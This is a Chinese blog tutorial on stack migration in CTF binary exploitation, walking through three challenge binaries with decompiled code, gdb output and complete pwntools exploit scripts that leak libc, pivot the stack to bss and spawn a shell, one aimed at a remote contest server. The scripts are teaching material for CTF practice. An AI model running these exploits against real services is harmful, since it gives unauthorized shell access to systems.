一篇文章玩明白Stack-migration

最新推荐文章于 2023-06-17 20:27:32 发布
最新推荐文章于 2023-06-17 20:27:32 发布
阅读量329 收藏
点赞数
文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YJ_12340/article/details/126122330
版权

前置知识

Intel汇编,栈溢出利用,基础rop链

Stack_migration介绍

当我们发现存在栈溢出漏洞,但是溢出字节非常小,比如0x10的时候我们就需要利用栈迁移,将栈迁移置足够大的区段去编写rop链

以达到我们利用的目的。为了方便教学,这里以CTF赛题的形式进行教学。

典例一 题目给出便于利用的bss段地址或栈地址

这里我用我出给自己校赛的一道题作为讲解,给出了栈的地址

int __cdecl main(int argc, const char **argv, const char **envp){char buf[208]; // [rsp+0h] [rbp-D0h] BYREF
puts(&s);puts("系统说罢,便将你渡入一方天地之中,只见天地之间一轮金日悬于九天之上,而在你面前是万里群山。\n");puts("钝日斩星剑就在这些山里,自己慢慢找吧,不过本系统可不想等太久,这个明神瞳就送你了!\n");printf("小子拿好了 :%p", buf);puts(&byte_400818); read(0, buf, 0xE0uLL);return puts("神兵已得,接下来,就去手刃你的第一个仇人吧,万阳帝仙!\n");}

这里是刚好溢出了0x10,并且给出了当前变量所处的栈地址,对于这种题目,都是直接套路杀的,而且这题没有开启canary和pie

我们只需要和往常一样先编写好rop链,再利用leave命令把栈迁移到到所给的bss段或者栈地址上

payload='a'*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)payload+='a'*(0xd0-len(payload))+p64(leak)+p64(leave)

第一次是泄露libc,第二次就是直接getshell

exp

# -*- coding: UTF-8 –*-from pwn import *r=process('./1')elf=ELF('./1')libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')#context.log_level='debug'puts_got=elf.got['puts']puts_plt=elf.plt['puts']pop_rdi=0x0000000000400663leave=0x4005F8main=0x0400577ret=0x000000000040044er.recvuntil('小子拿好了 :')leak=int(r.recv(14),16)log.success('leak:'+hex(leak))
payload='a'*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)payload+='a'*(0xd0-len(payload))+p64(leak)+p64(leave)
r.recvuntil("搬山之术?\n")r.send(payload)r.recvuntil('神兵已得,接下来,就去手刃你的第一个仇人吧,万阳帝仙!\n')(r.recvuntil('\n'))leak1=u64(r.recv(6).ljust(8,'\x00'))
log.success('leak1:'+hex(leak1))
base=leak1-0x080aa0onegadget=[0x4f3d5,0x4f432,0x10a41c]sys=base+0x04f550one=onegadget[2]+basesh=0x1b3e1a+baser.recvuntil('小子拿好了 :')leak2=int(r.recv(14),16)log.success('leak2:'+hex(leak2))
payload1='a'*8+p64(pop_rdi)+p64(sh)+p64(ret)+p64(sys)#payload1='a'*8+p64(one)payload1+='a'*(0xd0-len(payload1))+p64(leak2)+p64(leave)
r.send(payload1)
r.interactive()

典例二 题目开启了canary并且没有给定合理的地址

对于这种题目实际上只是迁移的地点要自己进行gdb调试(摁调)还有就是leave指令稍微加了点细节从read函数那下手

本质是和典例一没差别的,都是属于栈迁移。这里用一道自己写的demo作为教学

int __cdecl main(int argc, const char **argv, const char **envp){int i; // [rsp+Ch] [rbp-24h]char v6[24]; // [rsp+10h] [rbp-20h] BYREFunsigned __int64 v7; // [rsp+28h] [rbp-8h]
 v7 = __readfsqword(0x28u); init(argc, argv, envp);for ( i = 0; i <= 24; ++i ){if ( (unsigned int)read(0, &v6[i], 1uLL) != 1 || v6[i] == 10 )  {     v6[i] = 0;break;  }}printf("your in put%s\n", v6);puts("give me another worlds!"); pwnme();return __readfsqword(0x28u) ^ v7;}

在printf("your in put%s\n", v6);这可以泄露canary,我们接着去看pwnme函数​​​​​​​

unsigned __int64 pwnme(){char buf[24]; // [rsp+0h] [rbp-20h] BYREFunsigned __int64 v2; // [rsp+18h] [rbp-8h]
 v2 = __readfsqword(0x28u); read(0, buf, 0x30uLL);return __readfsqword(0x28u) ^ v2;}

同样溢出0x10,但是这次没有给定便于利用的题目,所以我们直接自己手动寻找,用ida ctrl+s 寻找到bss段的起始地址

一般利用地址都是大于bss起始地址最少0x300,具体如何要看自己的题目情况去调试

这里最主要的一点是接下来要讲的关于read函数的部分汇编利用​​​​​​​

.text:00000000004006FE                 lea     rax, [rbp+buf].text:0000000000400702                 mov     edx, 30h ; '0' ; nbytes.text:0000000000400707                 mov     rsi, rax       ; buf.text:000000000040070A                 mov     edi, 0         ; fd.text:000000000040070F                 mov     eax, 0.text:0000000000400714                 call    _read

正常像典例一我们不去开启canary,构造一个rop链最少都要0x20,这里开启了canary而且题目所给的变量长度只有0x20,可读入0x30

rop链构造完canary都不用填返回地址直接寄了,所以这里的要巧妙利用read的leave。

pl = 'a'*24+p64(canary)+p64(bss)+p64(reread

第一次先选中心仪的bss段把栈迁移上去,由于我们执行的汇编是在.text:00000000004006FE                 lea     rax, [rbp+buf]

当我们栈迁移完了此时还可以有一次读入的机会,这时候的读入地址就是我们选择的bss段地址。

此时我们就可以写入rop链达到libc泄露的目的​​​​​​​

pl = p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(canary)+p64(bss+0x18)+p64(reread)pl = pl.ljust(24,'\x00')

得到libc之后直接恢复栈​​​​​​​

pl = p64(0x400831)+p64(0)+p64(0x40083b)+p64(canary)+p64(0x6015d8)+p64(leave)sleep(0.1)s(pl)

第一个是rip的地址第二个是用来填充rbp第三个是填充返回地址的,0x6015d8是通过调试之后得知的最后恢复栈的时候

命令的起始地址​​​​​​​

pwndbg> stack 3000:0000│ rsp 0x6015c8 —▸ 0x400719 (pwnme+50) ◂— nop01:0008│ rsi 0x6015d0 ◂— 0x0... ↓        2 skipped04:0020│     0x6015e8 ◂— 0x27ce95767da5b40005:0028│ rbp 0x6015f0 ◂— 0x006:0030│     0x6015f8 —▸ 0x40083b (main+171) ◂— nop07:0038│     0x601600 ◂— 0x008:0040│     0x601608 —▸ 0x40083b (main+171) ◂— nop09:0048│     0x601610 ◂— 0x27ce95767da5b4000a:0050│     0x601618 —▸ 0x6015d8 ◂— 0x00b:0058│     0x601620 —▸ 0x40072e (pwnme+71) ◂— leave0c:0060│     0x601628 ◂— 0x0... ↓        17 skipped

我们可以继续结合汇编来看​​​​​​​

.text:0000000000400831                 mov     eax, 0.text:0000000000400836                 call    pwnme.text:000000000040083B                 nop.text:000000000040083C                 mov     rax, [rbp+var_8].text:0000000000400840                 xor     rax, fs:28h.text:0000000000400849                 jz      short locret_400850.text:000000000040084B                 call    ___stack_chk_fail

rip执行mov     eax, 0返回地址在.text:000000000040083B                 nop把canary填充做一个修补(第一次泄露的时候已经破坏了)

恢复完栈帧我们利用恢复的时候顺带迁移会去的bss段再去写入onegadget就直接getshell了

exp

import timefrom pwn import *context.arch = 'amd64'context.log_level = 'debug'
r = lambda : p.recv()rx = lambda x: p.recv(x)ru = lambda x: p.recvuntil(x)rud = lambda x: p.recvuntil(x, drop=True)s = lambda x: p.send(x)sl = lambda x: p.sendline(x)sa = lambda x, y: p.sendafter(x, y)sla = lambda x, y: p.sendlineafter(x, y)close = lambda : p.close()debug = lambda : gdb.attach(p)shell = lambda : p.interactive()
p = process('./Stack_migration')#p=remote('101.43.94.145','28079')elf = ELF('./Stack_migration')libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")puts_got = elf.got['puts']puts_plt = elf.plt['puts']reread = 0x4006FEleave = 0x40072Ebss = 0x601600rdi = 0x00000000004008c3start = 0x400600
s('a'*25)ru('a'*25)canary = u64('\x00'+rx(7))success(hex(canary))#p.recv()pl = 'a'*24+p64(canary)+p64(bss)+p64(reread)p.recv()s(pl)pl = p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(canary)+p64(bss+0x18)+p64(reread)pl = pl.ljust(24,'\x00')sleep(0.1)s(pl)pl = p64(0x400831)+p64(0)+p64(0x40083b)+p64(canary)+p64(0x6015d8)+p64(leave)sleep(0.1)s(pl)base = u64(ru('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['puts']ogg = base+0x4f3d5
pl = 'a'*24+p64(canary)+p64(0)+p64(ogg)s(pl)# debug()shell()

典例三 C++类的栈迁移

虽然线上赛不一定见得到,但是线下赛c++的趋势已经越来越明显了,不学c++你会失去很多你本该拿到的东西

这个也是我自己整理的一个demo,先看ida​​​​​​​

int __cdecl main(int argc, const char **argv, const char **envp){ __int64 v3; // rax __int64 v4; // rax __int64 v5; // rax __int64 v6; // raxchar s2[32]; // [rsp+0h] [rbp-20h] BYREF
 init();do{   v3 = std::operator<<<std::char_traits<char>>(          &std::cout,"The new year is coming, and the naughty beast has come to the world again. As a brave pwner, please send it home");std::ostream::operator<<(v3, &std::endl<char,std::char_traits<char>>);   v4 = std::operator<<<std::char_traits<char>>(&std::cout, "Little ones, throw up your firecrackers!!!!!!!");std::ostream::operator<<(v4, &std::endl<char,std::char_traits<char>>);std::operator>><char,std::char_traits<char>>(&std::cin, name);if ( strlen(name) > 0x10 )  {     v5 = std::operator<<<std::char_traits<char>>(&std::cout, &unk_4020B8);std::ostream::operator<<(v5, &std::endl<char,std::char_traits<char>>);exit(0);  }   getchar();   v6 = std::operator<<<std::char_traits<char>>(&std::cout, "Do you wanna try again?");std::ostream::operator<<(v6, &std::endl<char,std::char_traits<char>>);std::istream::get((std::istream *)&std::cin, s2, 0x30LL);}while ( !strcmp("Y", s2) );return 0;}

不熟悉的人看可能感觉很乱,其实有些东西是可以不看的例如​​​​​​​

std::operator<<<std::char_traits<char>>std::ostream::operator<<(v5, &std::endl<char,std::char_traits<char>>);

这些不过是c++自己的一些数据处理,我们要关注的是​​​​​​​

std::operator<<<std::char_traits<char>>这个函数里面的参数,例如下面这个std::istream::get((std::istream *)&std::cin, s2, 0x30LL);cin输入,往s2输入0x30大小的内容,类比可以看出输出的语句

顺带提一嘴,c++的输入输出都是靠std::operator<<std::char_traits<char>这个函数实现的,实现内容区别就在于第一个参数

cout就是输出cin就是输入,后面的参数再添加对应的就是cout的内容或者cin的内容及大小

OK 我们回归正题,分析程序可以得知

v5 = std::operator<<std::char_traits<char>(&std::cout, &unk_4020B8);

可能存在栈溢出cin没有做大小限制,但是他是在往bss段读入东西,所以没有溢出的可能性

std::istream::get((std::istream *)&std::cin, s2, 0x30LL);

这里溢出了0x10,可以栈迁移

那么结合起来就是先往bss段构造rop,利用栈迁移执行就行了,至于if ( strlen(name) > 0x10 )这个检测,我们直接填入0字节就可以绕过

剩余的操作无非就和典例一是一样的,这里注意的是c++的函数参数填充关系即可

pay=flat('\x00'*0x900,ret*0x20,rdi,cout,rsi,setbuf,0,std,main)

填充0x900的junk code 用来绕过以及填充到合适的地方布局,ret*0x20用来抬栈,这个看情况而定,本题不抬栈会破坏栈结构无法正确的传入参数,rdi,cout,rsi,setbuf,0,std,main这里翻译过来就是如下

std(cout,setbuf.got,0) 返回地址是main。

以上操作泄露了libc直接乱杀了,第二次栈迁移就是直接构造getshell的rop链就行了

exp​​​​​​​

from pwn import *#r=process('./boom')r=remote('47.107.51.210',6790)context.log_level='debug'context.arch = 'amd64'rdi=0x00000000004014c3rsi=0x00000000004014c1ret=0x00000000004014c4main=0x4012DAstd=0x401130setbuf=0x404018cout=0x4040C0bss=0x0404320leave=0x4013F8r.recv()pay=flat('\x00'*0x900,ret*0x20,rdi,cout,rsi,setbuf,0,std,main)r.sendline(pay)r.recv()pay=flat('\x00'*0x20,bss+0x900,leave)r.sendline(pay)r.recvuntil("Do you wanna try again?\n")libc=u64(r.recv(6)+b'\x00'*2)-0x087e60sys=libc+0x055410sh=libc+0x1b75aaprint(hex(libc))r.recv()pay=flat('\x00'*0x600,ret*0x20,rdi,sh,ret,sys,main)r.sendline(pay)r.recv()pay=flat('\x00'*0x20,bss+0x600,leave)r.sendline(pay)r.interactive()

实操推荐:https://www.hetianlab.com/cour.do?c=CCIDb18d-7cf9-4ba4-b75e-ed7aff569e3f

蚁景网络安全
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
静态分析:IDA逆向代码说明 text、idata、rdata、data
weixin_30902251的博客
10-17 886
通常IDA对一个PE文件逆向出来的代码中, 存在四个最基本的text、idata、rdata、data, 四个为PE文件的结构中对应的。 一、text: 该位程序代码,在该一开始就可以看到: .text:00401000 ; Segment type: Pure code.text:00401000 ; Segment permissions: Read/Execute ...
react-native-card-stack-swiper:像React-native-card-stack swiper一样的Tinder
02-05
npm install --save react-native-card-stack-swiper 预习 import CardStack , { Card } from 'react-native-card-stack-swiper' ; < CardStack xss=removed xss=removed xss=removed> { this . swiper = swiper ...
函数调用在栈中的流程
qq_43075448的博客
04-06 193
函数调用在栈中的流程
CTFshow-pwn入门-前置基础pwn13-pwn19
T1ngSh0w的博客
06-17 1923
ctfshow pwn入门-前置基础pwn13-pwn19
一道简单的smc自解密题目
m0_62690279的博客
03-27 1044
一道简单的smc自解密题目 攻防RE_BABYRE 64位elf,拉入ida 打开main函数 int __cdecl main(int argc, const char **argv, const char **envp) { char s[24]; // [rsp+0h] [rbp-20h] BYREF int v5; // [rsp+18h] [rbp-8h] int i; // [rsp+1Ch] [rbp-4h] for ( i = 0; i <= 181; ++i )
什么是BSS
heaiding的专栏
12-11 2615
<br />       今天学习IIC时,发现有清除BSS的功能代码,由于不知道什么是BSS,所以上网搜索相关知识,记录在此。<br />       BSS(Block Started by Symbol)这个词最初是UA-SAP汇编器(United Aircraft Symbolic Assembly Program)中的一个伪指令,用于为符号预留一块内存空间。该汇编器由美国联合航空公司于20世纪50年代中期为IBM 704大型机所开发。后来BSS这个词被作为关键字引入到了IBM 709和
redis-stack-server 7.2.0 安装包合集
最新发布
04-03
redis-stack-server-7.2.0-v9.arm64.snap redis-stack-server-7.2.0-v9.bionic.arm64.tar.gz redis-stack-server-7.2.0-v9.bionic.x86_64.tar.gz redis-stack-server-7.2.0-v9.bullseye.x86_64.tar.gz redis-stack-...
WebStack-Laravel-master.zip
07-14
【标题】"WebStack-Laravel-master.zip" 是一个与WordPress相关的主题包,它引入了Laravel框架的一些元素,为用户提供了一种独特的导航体验。Laravel是PHP开发领域中一款非常流行的开源框架,以其优雅的语法和强大的...
stack-in-card:将多张卡分组为一张无边界的卡
05-02
和horizontal-stack-in-card替代品 它允许将多张卡分组为一张没有边界的卡。 默认情况下,它将垂直堆叠所有内容。 选项 如果堆栈中的卡定义了--keep-background CSS样式,则不会替换背景。 例如,这对于很有用。 您...
Stack-Stack-Stack
12-23
Stack-Stack-Stack
ida动态调试elf(无坑详细)
abc_670的博客
04-24 1万+
虽然linux下有gdb,radare2等神器,但有时候难免有用到ida动态调试linux下文件的时候,这次自己按照网上教程来但是踩了无数坑,所以打算自己写一篇教程1.把ida中dbgsrv目录下的linux_server或者linux_serverx64放到linux中(根据自己要调试的程序选择哪个版本的)2.chmod a+x linux_serverx64改变属性,然后运行 linux_se...
BSS为什么需要初始化
shanzhizi的专栏
08-15 6238
http://www.cnblogs.com/amanlikethis/p/3384743.html 我们都知道bss需要初始化,但是这是为什么呢?        通过浏览资料,我们都会发现,bss是不会出现在程序下载文件(*.bin *.hex)中的,因为全都是0。如果把它们出现在程序下载文件中,会增加程序下载文件的大小。实际应用中,通常只需要把bss的起始地址和结束地址保存起来,
ELF文件格式在IDA中解析
Denny_Chen_的博客
10-08 3871
一.ELF文件在IDA中展现形式 ELF文件本身是一个二进制文件,对应IDA中 HEX VIEW 界面中内容,但用户关注更多的内容可能是 IDA VIEW。IDA VIEW中是对 HEX VIEW 界面中内容从头到尾的解析,并且内容一一对应(HEX VIEW内容偏移和IDA VIEW的左侧地址对应,不管鼠标在IDA VIEW还是HEX VIEW的哪个位置停留,点击进另一个界面时,地址或偏移都是对应的)。不管二进制文件有多大,解析的汇编内容都只是在IDA VIEW,只是文件很大时,解析会比较慢。 如果二进制内
bss上格式化字符串处理【buuoj】SWPUCTF_2019_login
weixin_46521144的博客
08-10 1040
这道题用了两种方法去做,一种是修改got表,零一种是修改返回值控制执行流。 IDA分析 很明显的格式化字符串漏洞,但是是在bss上 总结一下32位格式化字符串在bss上的处理方法就是:寻找一个类似ebp的栈上寄存器,如下图 通过修改这个ebp,可以修改上图0xffc78f38的值为想要的(记住:格式化字符串修改栈上指针指向区域的地址,因此是0xffc78f38)如果想要劫持got表,寻找下面80开头的数据(和got表比较相关)修改完后就可以变成下图这样 (思考一下为什么要这么写:因为一般的格式化字符
vs error 无法解析的外部符号 _main,该符号在函数 “int __cdecl invoke_main
热门推荐
highlighters的博客
05-28 1万+
原因分析 出现这种问题的原因,有很多种,第一种也是最常见的,是你的项目中出现了多个cpp文件,而且里面包含多个main函数。 第二种是你的代码是从qq或其他方式(如记事本)复制而来的代码,这种时候换行符可能会发生变化,看了网上大佬的解释,换行符是有很多个编码的,格式不对就会出问题,这种时候往往会提示要求你将源文件转化为DOS或UNIx格式,出现警告说明你属于这一种情况,你需要在vs的文件菜单里找到高级保存选项(vs高版本需要在设置里调出来,不会的百度搜),然后选择window(CR LF),即window
IDA Pro 权威指南学习笔记(六) - 次要的 IDA 显示窗口
andiao1218的博客
08-14 753
十六进制窗口 IDA 十六进制窗口可以配置为显示各种格式,并可作为十六进制编辑器使用 默认情况下,十六进制窗口显示程序内容和列表的标准十六进制代码,每行显示 16 个字节,以及其对应的 ASCII 字符 和在反汇编窗口中一样,用户也可以同时打开几个十六进制窗口 第一个十六进制窗口叫做 Hex View-A,第二个十六进制窗口叫做 Hex View-B,接下来的窗口叫做 Hex V...
stack->data[++stack->top1] = value与stack->data[stack->top1++] = value;有什么区别
07-25
`stack->data[++stack->top1] = value` 和 `stack->data[stack->top1++] = value` 是两种不同的写法,但在这个特定的情况下,它们实际上是等价的。 假设 `top1` 的初始值为 0,并且执行这两个语句之前,栈 `stack` ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值